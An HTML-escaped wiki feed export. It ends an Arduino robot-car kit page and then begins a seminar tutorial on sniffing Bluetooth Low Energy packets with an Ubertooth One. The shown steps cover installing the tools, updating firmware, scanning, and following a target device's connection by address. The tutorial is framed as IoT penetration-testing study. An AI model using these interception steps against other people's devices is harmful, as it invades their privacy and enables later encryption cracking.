    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;9&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF5AA5&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16734885&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;0&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF4AB5&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16730805&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;OK&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF02FD&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16712445&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;*&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF32BD&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16728765&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;#&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF52AD&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16732845&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:IR_Receiver_Schematics.png|600px]]&lt;br /&gt;
=== Code ===&lt;br /&gt;
==== Output IR-Remote control values ====&lt;br /&gt;
My intention is to steer the car with the IR-Remote-Control included in the kit. This sketch outputs the values the IR-Receiver gets from the remote control so I know the values I&#039;m working with.&lt;br /&gt;
&lt;br /&gt;
 # include &amp;lt;IRremote.h&amp;gt;&lt;br /&gt;
 int RECV_PIN = 11;&lt;br /&gt;
 IRrecv irrecv(RECV_PIN);&lt;br /&gt;
 decode_results results;&lt;br /&gt;
 void setup()&lt;br /&gt;
 {&lt;br /&gt;
     Serial.begin(9600);&lt;br /&gt;
     irrecv.enableIRIn(); // Start the receiver&lt;br /&gt;
 }&lt;br /&gt;
 void loop()&lt;br /&gt;
 {&lt;br /&gt;
     if (irrecv.decode(&amp;amp;results))&lt;br /&gt;
     {&lt;br /&gt;
         Serial.println(results.value, HEX);&lt;br /&gt;
         irrecv.resume(); // Receive the next value&lt;br /&gt;
     }&lt;br /&gt;
 }&lt;br /&gt;
==== Steer car with IR-Remote control ====&lt;br /&gt;
 # include &amp;lt;IRremote.h&amp;gt;&lt;br /&gt;
 int IN1 = 5;&lt;br /&gt;
 int IN2 = 6;&lt;br /&gt;
 int IN3 = 7;&lt;br /&gt;
 int IN4 = 8;&lt;br /&gt;
 int ENA = 9;&lt;br /&gt;
 int ENB = 10;&lt;br /&gt;
 int RECV_PIN = 11;&lt;br /&gt;
 IRrecv irrecv(RECV_PIN);&lt;br /&gt;
 decode_results results;&lt;br /&gt;
 decode_results lastResult;&lt;br /&gt;
 void setup()&lt;br /&gt;
 {&lt;br /&gt;
     for (int i = 5; i &amp;lt; 11; i++)&lt;br /&gt;
     {&lt;br /&gt;
         pinMode(i, OUTPUT);&lt;br /&gt;
     }&lt;br /&gt;
     Serial.begin(9600);&lt;br /&gt;
     irrecv.enableIRIn(); // Start the receiver&lt;br /&gt;
 }&lt;br /&gt;
 void loop()&lt;br /&gt;
 {&lt;br /&gt;
     if (irrecv.decode(&amp;amp;results))&lt;br /&gt;
     {&lt;br /&gt;
         if (results.value != lastResult.value)&lt;br /&gt;
         {&lt;br /&gt;
             switch (results.value)&lt;br /&gt;
             {&lt;br /&gt;
                 //ArrowUp&lt;br /&gt;
                 case 16736925:&lt;br /&gt;
                     driveForward();&lt;br /&gt;
                     break;&lt;br /&gt;
                 //ArrowDown&lt;br /&gt;
                 case 16754775:&lt;br /&gt;
                     driveReverse();&lt;br /&gt;
                     break;&lt;br /&gt;
                 //ArrowRight&lt;br /&gt;
                 case 16761405:&lt;br /&gt;
                     turnClockwise();&lt;br /&gt;
                     break;&lt;br /&gt;
                 //ArrowLeft&lt;br /&gt;
                 case 16720605:&lt;br /&gt;
                     turnCounterClockwise();&lt;br /&gt;
                     break;&lt;br /&gt;
                 //Ok&lt;br /&gt;
                 case 16712445:&lt;br /&gt;
                     brake();&lt;br /&gt;
                     break;&lt;br /&gt;
             }&lt;br /&gt;
             lastResult = results;&lt;br /&gt;
         }&lt;br /&gt;
         irrecv.resume(); // Receive the next value&lt;br /&gt;
     }&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void driveForward()&lt;br /&gt;
 {&lt;br /&gt;
     analogWrite(ENA, 0);&lt;br /&gt;
     analogWrite(ENB, 0);&lt;br /&gt;
     digitalWrite(IN1, LOW);&lt;br /&gt;
     digitalWrite(IN2, HIGH);&lt;br /&gt;
 &lt;br /&gt;
     digitalWrite(IN3, HIGH);&lt;br /&gt;
     digitalWrite(IN4, LOW);&lt;br /&gt;
     delay(150);&lt;br /&gt;
     analogWrite(ENA, 100);&lt;br /&gt;
     analogWrite(ENB, 100);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void driveReverse()&lt;br /&gt;
 {&lt;br /&gt;
     analogWrite(ENA, 0);&lt;br /&gt;
     analogWrite(ENB, 0);&lt;br /&gt;
     digitalWrite(IN1, HIGH);&lt;br /&gt;
     digitalWrite(IN2, LOW);&lt;br /&gt;
 &lt;br /&gt;
     digitalWrite(IN3, LOW);&lt;br /&gt;
     digitalWrite(IN4, HIGH);&lt;br /&gt;
     delay(150);&lt;br /&gt;
     analogWrite(ENA, 100);&lt;br /&gt;
     analogWrite(ENB, 100);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void turnClockwise()&lt;br /&gt;
 {&lt;br /&gt;
     analogWrite(ENA, 0);&lt;br /&gt;
     analogWrite(ENB, 0);&lt;br /&gt;
     digitalWrite(IN1, HIGH);&lt;br /&gt;
     digitalWrite(IN2, LOW);&lt;br /&gt;
 &lt;br /&gt;
     digitalWrite(IN3, HIGH);&lt;br /&gt;
     digitalWrite(IN4, LOW);&lt;br /&gt;
     delay(150);&lt;br /&gt;
     analogWrite(ENA, 150);&lt;br /&gt;
     analogWrite(ENB, 150);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void turnCounterClockwise()&lt;br /&gt;
 {&lt;br /&gt;
     analogWrite(ENA, 0);&lt;br /&gt;
     analogWrite(ENB, 0);&lt;br /&gt;
     digitalWrite(IN1, LOW);&lt;br /&gt;
     digitalWrite(IN2, HIGH);&lt;br /&gt;
 &lt;br /&gt;
     digitalWrite(IN3, LOW);&lt;br /&gt;
     digitalWrite(IN4, HIGH);&lt;br /&gt;
     delay(150);&lt;br /&gt;
     analogWrite(ENA, 150);&lt;br /&gt;
     analogWrite(ENB, 150);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void brake()&lt;br /&gt;
 {&lt;br /&gt;
     analogWrite(ENA, 0);&lt;br /&gt;
     analogWrite(ENB, 0);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
== Bluetooth Module ==&lt;br /&gt;
=== Specification ===&lt;br /&gt;
* Bluetooth Protocol: Bluetooth 2.1+ EDR Standard&lt;br /&gt;
* USB Protocol: USB v1.1/2.0&lt;br /&gt;
* Operating Frequency: 2.4GHz ISM Frequency Band&lt;br /&gt;
* Modulation Mode: Gauss Frequency Shift Keying&lt;br /&gt;
* Transmit Power: ≤ 4dBm, Second Stage&lt;br /&gt;
* Sensitivity: ≤-84dBm at 0.1% Bit Error Rate&lt;br /&gt;
* Transmission Speed: 2.1Mbps(Max)/160 kbps(Asynchronous)； 1Mbps/1Mbps(Synchronous)&lt;br /&gt;
* Safety Feature: Authentication and Encryption&lt;br /&gt;
* Supported Configuration: Bluetooth Serial Port (major and minor)&lt;br /&gt;
* Supply Voltage: 5V DC 50mA &lt;br /&gt;
* Operating Temperature: -20 to 55℃&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:Bluetooth_Module_Schematics.png|600px]]&lt;br /&gt;
=== Code ===&lt;br /&gt;
 int val;&lt;br /&gt;
 int ledpin = 13;&lt;br /&gt;
 void setup()&lt;br /&gt;
 {&lt;br /&gt;
     Serial.begin(9600);&lt;br /&gt;
     pinMode(ledpin, OUTPUT);&lt;br /&gt;
 }&lt;br /&gt;
 void loop()&lt;br /&gt;
 {&lt;br /&gt;
     val = Serial.read();&lt;br /&gt;
     if (val == &#039;a&#039;)&lt;br /&gt;
     {&lt;br /&gt;
         digitalWrite(ledpin, HIGH);&lt;br /&gt;
         delay(250);&lt;br /&gt;
         digitalWrite(ledpin, LOW);&lt;br /&gt;
         delay(250);&lt;br /&gt;
         Serial.println(&amp;quot;keyestudio&amp;quot;);&lt;br /&gt;
     }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
== Obstacle Avoidance ==&lt;br /&gt;
This code measures the distance between the car and the object in front of it. If the distance between both is under 15cm the car will turn 180° and continue to drive forward. I used the Ultra-Sonic Sensor to measure the distance and the I2C-Display to display the current distance.&lt;br /&gt;
=== Code === &lt;br /&gt;
 #define echoPin 3 // Echo Pin&lt;br /&gt;
 #define trigPin 4 // Trigger Pin&lt;br /&gt;
 &lt;br /&gt;
 #include &amp;lt;Wire.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;LiquidCrystal_I2C.h&amp;gt;&lt;br /&gt;
 int maximumRange = 200; // Maximum range needed&lt;br /&gt;
 int minimumRange = 0; // Minimum range needed&lt;br /&gt;
 long duration, distance; // Duration used to calculate distance&lt;br /&gt;
 LiquidCrystal_I2C lcd(0x27,3,1);&lt;br /&gt;
 bool state = true;&lt;br /&gt;
 int IN1 = 5;&lt;br /&gt;
 int IN2 = 6;&lt;br /&gt;
 int IN3 = 7;&lt;br /&gt;
 int IN4 = 8;&lt;br /&gt;
 int ENA = 9;&lt;br /&gt;
 int ENB = 10;&lt;br /&gt;
 &lt;br /&gt;
 void setup()&lt;br /&gt;
 {&lt;br /&gt;
     Serial.begin(9600);&lt;br /&gt;
     pinMode(trigPin, OUTPUT);&lt;br /&gt;
     pinMode(echoPin, INPUT);&lt;br /&gt;
     for (int i = 5; i &amp;lt; 11; i++)&lt;br /&gt;
     {&lt;br /&gt;
         pinMode(i, OUTPUT);&lt;br /&gt;
     }&lt;br /&gt;
     lcd.init();&lt;br /&gt;
     lcd.backlight();&lt;br /&gt;
     delay(5000);&lt;br /&gt;
     driveForward();&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void loop()&lt;br /&gt;
 {&lt;br /&gt;
     /* The following trigPin/echoPin cycle is used to determine the&lt;br /&gt;
      distance of the nearest object by bouncing soundwaves off of it. */&lt;br /&gt;
     digitalWrite(trigPin, LOW);&lt;br /&gt;
     delayMicroseconds(2);&lt;br /&gt;
 &lt;br /&gt;
     digitalWrite(trigPin, HIGH);&lt;br /&gt;
     delayMicroseconds(10);&lt;br /&gt;
     digitalWrite(trigPin, LOW);&lt;br /&gt;
     duration = pulseIn(echoPin, HIGH);&lt;br /&gt;
 &lt;br /&gt;
     //Calculate the distance (in cm) based on the speed of sound.&lt;br /&gt;
     distance = duration / 58.3;&lt;br /&gt;
 &lt;br /&gt;
     if (distance &amp;gt;= maximumRange || distance &amp;lt;= minimumRange)&lt;br /&gt;
     {&lt;br /&gt;
         /* Send a negative number to computer and Turn LED ON &lt;br /&gt;
         to indicate &amp;quot;out of range&amp;quot; */&lt;br /&gt;
         lcd.clear();&lt;br /&gt;
         lcd.setCursor(3, 0);&lt;br /&gt;
         lcd.print(&amp;quot;-1&amp;quot;);&lt;br /&gt;
         Serial.println(&amp;quot;-1&amp;quot;);&lt;br /&gt;
     }&lt;br /&gt;
     else&lt;br /&gt;
     {&lt;br /&gt;
         /* Send the distance to the computer using Serial protocol, and&lt;br /&gt;
         turn LED OFF to indicate successful reading. */&lt;br /&gt;
         if (distance &amp;lt;= 15 &amp;amp;&amp;amp; state != false)&lt;br /&gt;
         {&lt;br /&gt;
             state = false;&lt;br /&gt;
             brake();&lt;br /&gt;
             delay(200);&lt;br /&gt;
             turnClockwise();&lt;br /&gt;
             delay(780);&lt;br /&gt;
             state = true;&lt;br /&gt;
             driveForward();&lt;br /&gt;
         }&lt;br /&gt;
         else if (distance &amp;gt;= 30 &amp;amp;&amp;amp; state != true)&lt;br /&gt;
         {&lt;br /&gt;
             state = true;&lt;br /&gt;
             driveForward();&lt;br /&gt;
         }&lt;br /&gt;
         lcd.clear();&lt;br /&gt;
         lcd.setCursor(3, 0);&lt;br /&gt;
         lcd.print(distance);&lt;br /&gt;
         Serial.println(distance);&lt;br /&gt;
     }&lt;br /&gt;
     //Delay 50ms before next reading.&lt;br /&gt;
     delay(50);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void driveForward()&lt;br /&gt;
 {&lt;br /&gt;
     analogWrite(ENA, 0);&lt;br /&gt;
     analogWrite(ENB, 0);&lt;br /&gt;
     digitalWrite(IN1, LOW);&lt;br /&gt;
     digitalWrite(IN2, HIGH);&lt;br /&gt;
 &lt;br /&gt;
     digitalWrite(IN3, HIGH);&lt;br /&gt;
     digitalWrite(IN4, LOW);&lt;br /&gt;
     delay(150);&lt;br /&gt;
     analogWrite(ENA, 100);&lt;br /&gt;
     analogWrite(ENB, 100);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void driveReverse()&lt;br /&gt;
 {&lt;br /&gt;
     analogWrite(ENA, 0);&lt;br /&gt;
     analogWrite(ENB, 0);&lt;br /&gt;
     digitalWrite(IN1, HIGH);&lt;br /&gt;
     digitalWrite(IN2, LOW);&lt;br /&gt;
 &lt;br /&gt;
     digitalWrite(IN3, LOW);&lt;br /&gt;
     digitalWrite(IN4, HIGH);&lt;br /&gt;
     delay(150);&lt;br /&gt;
     analogWrite(ENA, 100);&lt;br /&gt;
     analogWrite(ENB, 100);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void turnClockwise()&lt;br /&gt;
 {&lt;br /&gt;
     analogWrite(ENA, 0);&lt;br /&gt;
     analogWrite(ENB, 0);&lt;br /&gt;
     digitalWrite(IN1, LOW);&lt;br /&gt;
     digitalWrite(IN2, HIGH);&lt;br /&gt;
 &lt;br /&gt;
     digitalWrite(IN3, LOW);&lt;br /&gt;
     digitalWrite(IN4, HIGH);&lt;br /&gt;
     delay(150);&lt;br /&gt;
     analogWrite(ENA, 200);&lt;br /&gt;
     analogWrite(ENB, 200);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void brake()&lt;br /&gt;
 {&lt;br /&gt;
     analogWrite(ENA, 0);&lt;br /&gt;
     analogWrite(ENB, 0);&lt;br /&gt;
 }&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Smart Robot Car Kit Bluetooth 4WD keyestudio]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wiki.keyestudio.com/Ks0192_keyestudio_4WD_Bluetooth_Multi-functional_Car&lt;br /&gt;
* https://www.youtube.com/watch?v=GAqvzCXEUSw&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Bluetooth_Sniffing_with_Ubertooth:_A_Step-by-step_guide&amp;diff=6072</id>
		<title>Bluetooth Sniffing with Ubertooth: A Step-by-step guide</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Bluetooth_Sniffing_with_Ubertooth:_A_Step-by-step_guide&amp;diff=6072"/>
		<updated>2021-02-27T22:04:37Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* Demo Project */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
This is a tutorial on how to sniff Bluetooth Low Energy (BLE) packets using the [[Ubertooth One, 2.4 GHz wireless development platform]] device.&lt;br /&gt;
This guide will detail the setup process and outline every step to capture a BLE connection. Furthermore, it will provide methods of bluetooth hacking, i.e cracking the encryption of a BLE connection and overwriting characteristics of a device.&lt;br /&gt;
This tutorial is created in regard to the seminar paper: [[File:Pentesting in IoT Bluetooth Sniffing.pdf]]&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Linux-based Operating system: this test used [https://www.kali.org/downloads/ Kali Linux 64-Bit v2019.4 native install]&lt;br /&gt;
* BLE devices &lt;br /&gt;
* Tools: crackle, gatttool&lt;br /&gt;
&lt;br /&gt;
== BLE Fundamentals ==&lt;br /&gt;
&lt;br /&gt;
Fundamentals of the BLE Standard can be found at the [[BLE Fundamentals]] documentation.&lt;br /&gt;
&lt;br /&gt;
== Capturing BLE packets ==&lt;br /&gt;
&lt;br /&gt;
=== Step 1 - Prerequisites  ===&lt;br /&gt;
&lt;br /&gt;
Ubertooth One offers a well-documented GitHub-repository [https://github.com/greatscottgadgets/ubertooth/wiki]. Follwowing its instructions, the device&#039;s tools require several components. To fulfill the demands, one has to install:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo apt-get install cmake libusb-1.0-0-dev make gcc g++ libbluetooth-dev pkg-config python3-numpy python3-qtpy&amp;lt;/code&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
In contrast to the guide, the &#039;&#039;python-pyside&#039;&#039; component needs to be installed separately using the &#039;&#039;pip-installer&#039;&#039;: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;pip install pyside3&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In order to for Ubertooth tools to decode Bluetooth packets the Bluetooth baseband library (&#039;&#039;libbtbb&#039;&#039;) needs to be downloaded and installed:&lt;br /&gt;
&lt;br /&gt;
 wget &amp;lt;nowiki&amp;gt;https://github.com/greatscottgadgets/libbtbb/archive/2018-12-R1.tar.gz -O libbtbb-2018-12-R1.tar.gz&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 tar -xf libbtbb-2018-12-R1.tar.gz&lt;br /&gt;
 cd libbtbb-2018-12-R1&lt;br /&gt;
 mkdir build&lt;br /&gt;
 cd build&lt;br /&gt;
 cmake ..&lt;br /&gt;
 make&lt;br /&gt;
 sudo make install&lt;br /&gt;
 sudo ldconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Following that, the Ubertooth tools can be downloaded from the GitHub repository. They include host code, which enables sniffing Bluetooth packets. Additionally, they provide means to configure the Ubertooth device, including a simplified method for a firmware update.&lt;br /&gt;
&lt;br /&gt;
 wget &amp;lt;nowiki&amp;gt;https://github.com/greatscottgadgets/ubertooth/releases/download/2018-12-R1/ubertooth-2018-12-R1.tar.xz&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 tar xf ubertooth-2018-12-R1.tar.xz&lt;br /&gt;
 cd ubertooth-2018-12-R1/host&lt;br /&gt;
 mkdir build&lt;br /&gt;
 cd build&lt;br /&gt;
 cmake ..&lt;br /&gt;
 make&lt;br /&gt;
 sudo make install&lt;br /&gt;
 sudo ldconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The Wireshark Bluetooth Baseband (&#039;&#039;BTBB&#039;&#039;) and Basic Rate/Enhanced Data Rate (&#039;&#039;BR/EDR&#039;&#039;) plugins facilitate the analysis of Bluetooth baseband traffic that has been captured within the Wireshark GUI. &lt;br /&gt;
The plugins need to be installed both separately from the &#039;&#039;libbtbb&#039;&#039; library. For the BTBB plugin the following commands have been used:&lt;br /&gt;
&lt;br /&gt;
 sudo apt-get install wireshark wireshark-dev libwireshark-dev cmake&lt;br /&gt;
 cd libbtbb-2018-12-R1/wireshark/plugins/btbb&lt;br /&gt;
 mkdir build&lt;br /&gt;
 cd build&lt;br /&gt;
 cmake -DCMAKE_INSTALL_LIBDIR=/usr/lib/x86_64-linux-gnu/wireshark/libwireshark3/plugins ..&lt;br /&gt;
 make&lt;br /&gt;
 sudo make install&lt;br /&gt;
&lt;br /&gt;
It is important to state that the &#039;&#039;MAKE_INSTALL_LIBDIR&#039;&#039; directory can vary depending on the OS used and the wireshark installation. However, it should be the directory of existing Wireshark plugins.&lt;br /&gt;
The procedure needs to be repeated for the &#039;&#039;BR/EDR&#039;&#039; plugin.&lt;br /&gt;
&lt;br /&gt;
 cd libbtbb-2018-12-R1/wireshark/plugins/btbredr&lt;br /&gt;
 mkdir build&lt;br /&gt;
 cd build&lt;br /&gt;
 cmake -DCMAKE_INSTALL_LIBDIR=/usr/lib/x86_64-linux-gnu/wireshark/libwireshark3/plugins ..&lt;br /&gt;
 make&lt;br /&gt;
 sudo make install&lt;br /&gt;
&lt;br /&gt;
=== Step 2 - Verification &amp;amp; Firmware Update ===&lt;br /&gt;
&lt;br /&gt;
After installing the prerequisits, the Ubertooth One device was plugged in through a USB port. It is of utmost importance to operate the Ubertooth One with the antenna attached to it. Otherwise, there is a risk of damaging the device. After inserting the device, verify that the system detects it:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This will display information about USB buses in the system and the devices connected to them:&lt;br /&gt;
&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 001 Device 005: ID 04f2:b595 Chicony Electronics Co., Camera&lt;br /&gt;
 Bus 001 Device 004: ID 138a:003f Validity Sensors, Inc. VFS495&lt;br /&gt;
 Bus 001 Device 003: ID 8087:0a2b Intel Corp.&lt;br /&gt;
 Bus 001 Device 002: ID 1ea7:0064 SHARKOON Technologies 2.4G Mouse&lt;br /&gt;
 Bus 001 Device 014: ID 1d50:6002 &#039;&#039;&#039;OpenMoko, Inc. Ubertooth One&#039;&#039;&#039;&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Upon first operation of the Ubertooth One it is necessary to update its firmware. The tools, which were downloaded before, facilitate a simplified way to achieve this task. Change the directory to the firmware directory of Ubertooth and execute the following command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-dfu -d bluetooth_rxtx.dfu -r&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If the update is successful, this output will be produced:&lt;br /&gt;
&lt;br /&gt;
 Switching to DFU mode...&lt;br /&gt;
 Checking firmware signature&lt;br /&gt;
 ........................................&lt;br /&gt;
 ........................................&lt;br /&gt;
 ........................................&lt;br /&gt;
 Detached&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To verify the firmware-version enter the following command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-util -v&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 3 - Ubertooth Spectrum Analyzer ===&lt;br /&gt;
&lt;br /&gt;
It is recommended to validate the functionality of the Ubertooth device via the spectrum analyzer, which is a tool to analyze the 2.4GHz band.&lt;br /&gt;
Specifically, it provides a Graphical User Interface (GUI) tool named ubertooth-specan-ui, which visually monitors the frequencies. This command will start the spectrum analyzer:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-specan-ui&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Once successful, you can see the analyzer work its task through a powerful GUI:&lt;br /&gt;
&lt;br /&gt;
[[File:Ubertooth Spectrum Analyzer.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In this case the figure shows several 802.11b networks in different channels, represented by green amplitudes.&lt;br /&gt;
The white amplitudes depict beacons that are visible during scanning. The red lines adjust to different centers of frequency channels in the 2.4GHz radio band.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 4 - Intercepting Lower Address Part (LAP) Packets ===&lt;br /&gt;
&lt;br /&gt;
The &#039;&#039;BD_ADDR&#039;&#039; makes the allocation of sniffed Bluetooth packets possible. The Ubertooth One can start the LAP scan with this command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-rx&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A continuous output will follow on the console:&lt;br /&gt;
&lt;br /&gt;
 systime=1578428685 ch=26 LAP=3a5138 err=1 clkn=8355 clk_offset=5199 s=-80 n=-55 snr=-25&lt;br /&gt;
 systime=1578428688 ch=26 LAP=3a5138 err=1 clkn=18479 clk_offset=5628 s=-81 n=-55 snr=-26&lt;br /&gt;
 systime=1578428692 ch=43 LAP=3a5138 err=2 clkn=28967 clk_offset=6029 s=-80 n=-55 snr=-25&lt;br /&gt;
 systime=1578428692 ch=47 LAP=3a5138 err=2 clkn=30327 clk_offset=6069 s=-81 n=-55 snr=-26&lt;br /&gt;
 systime=1578428694 ch=52 LAP=3a5138 err=1 clkn=36948 clk_offset=87 s=-79 n=-55 snr=-24&lt;br /&gt;
 systime=1578428696 ch=53 LAP=3a5138 err=0 clkn=42360 clk_offset=302 s=-77 n=-55 snr=-22&lt;br /&gt;
&lt;br /&gt;
In the output &#039;&#039;&#039;ch&#039;&#039;&#039; represents the channel used by the device referenced in the LAP value. &lt;br /&gt;
The channel hopping is clearly comprehensible. &#039;&#039;&#039;Clkn&#039;&#039;&#039; indicates the master`s clock, while &#039;&#039;&#039;s&#039;&#039;&#039; references the signal strength and &#039;&#039;&#039;n&#039;&#039;&#039; states the value of noise.&lt;br /&gt;
Following that the &#039;&#039;&#039;snr&#039;&#039;&#039; value represents the signal-to-noise ratio. &lt;br /&gt;
This mode is especially helpful for undiscoverable devices, because it can calculate a BD_ADDR through the LAP in combination with the other parameters.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Alternatively, if the devices are discoverable, you can use the BLE scan of hcitools:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo hcitool lescan&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Among eventual other devices you should see the BLE devices you are testing, in this case the thermostat and the fitness tracker:&lt;br /&gt;
 &lt;br /&gt;
 D5:AA:D0:41:A3:60 Mi Smart Band 4&lt;br /&gt;
 78:A5:04:62:71:3D TepHeatB&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 5 - The Ubertooth-BTLE Tool ===&lt;br /&gt;
&lt;br /&gt;
One of the most powerful tools the Ubertooth One provides is the Bluetooth Low Energy sniffing mode.&lt;br /&gt;
Among other things, it can sniff and follow connections and even interfere with them.&lt;br /&gt;
In the &amp;quot;follow&amp;quot; mode, Ubertooth listens on one of the three advertising channels.&lt;br /&gt;
Once a BLE connection is established (on the advertising channel the device has been listenting to), Ubertooth will follow the hops along the data channels capturing the transmissions between the devices.&lt;br /&gt;
Per default, Ubertooth can be used to follow any connection it observes randomly.&lt;br /&gt;
Naturally, the device can be restricted to observe a specific device by providing the &#039;&#039;BD_ADDR&#039;&#039; of the device in question.&lt;br /&gt;
The general syntax of the corresponding command for &amp;quot;follow&amp;quot; mode looks like:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-btle -f &amp;lt;nowiki&amp;gt;&amp;lt;BD_ADDR&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
